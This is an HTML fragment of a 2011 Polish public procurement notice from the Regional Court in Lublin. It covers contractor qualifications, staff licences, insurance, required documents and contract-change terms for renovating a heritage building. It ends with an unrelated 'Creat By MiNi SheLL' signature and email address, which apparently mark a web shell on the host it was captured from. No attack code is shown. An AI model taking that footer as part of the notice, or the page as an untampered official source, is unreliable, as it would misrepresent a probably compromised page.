<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia nie spełnia. 
Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  
co najmniej:
- jedną realizacją remontu budynku użyteczności publicznej wpisanego do rejestru zabytków o  wartości robót min. 7 000 000,00 zł brutto oraz wykaże się wykonaniem w nim następujących robót:
1)wymianą pokrycia dachowego,
2)wymianą stropów,
3)wymianą drewnianej stolarki drzwiowej,
i potwierdzi, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia nie spełnia.
Wykonawca musi mieć do dyspozycji osoby legitymujące się doświadczeniem i kwalifikacjami odpowiednimi do stanowisk, jakie zostaną im powierzone. Wykonawca przedstawi w ofercie kandydata/kandydatów na każde nw stanowisko:
1. Kierownik budowy - uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych zgodnie z rozporządzeniem Ministra Kultury z dnia 9 czerwca 2004 r.  w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków(Dz. U. z 2004 r., Nr 150, poz. 1579)
2. Kierownik robót sanitarnych - uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń.
3. Kierownik robót elektrycznych - uprawnienia do kierowania budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.
Wszystkie osoby wymienione w ofercie winny posiadać odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r., Nr 156, poz. 1118 z późniejszymi zmianami) oraz z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych budownictwie (Dz.U. z 2006 r., Nr 83, poz. 578) i być czynnym członkiem właściwej Izby Samorządu Zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia nie spełnia.
Wykonawca spełni warunek, jeżeli do oferty załączy opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 15 000 000,00 zł w okresie realizacji przedmiotu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w przypadku:
14.3.1 aktualizacji rozwiązań ze względu na postęp technologiczny (np. wycofanie z obrotu urządzeń lub materiałów); zmiana nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której,  był dokonany wybór wykonawcy;
14.3.2 w przypadku przerw w realizacji robót z winy Zamawiającego, Zamawiający dopuszcza wydłużenie terminu realizacji umowy o czas przerwy, a także możliwość zwiększenia wynagrodzenia ryczałtowego o współczynnik wzrostu cen robót budowlanych wg. katalogów Secocenbud;
14.3.3 w przypadku zmiany podatku VAT Zamawiający uwzględni zmianę kwoty ryczałtowej o stosowny procent zmiany podatku, przy czym zmiana będzie mogła objąć wyłącznie cześć wynagrodzenia za roboty budowlane, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> lublin.so.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy w Lublinie ul. Krakowskie Przedmieście 43 pokój nr 209..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2011 godzina 11:00, miejsce: Sąd Okręgowy w Lublinie ul. Krakowskie Przedmieście 43 pokój nr 209..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com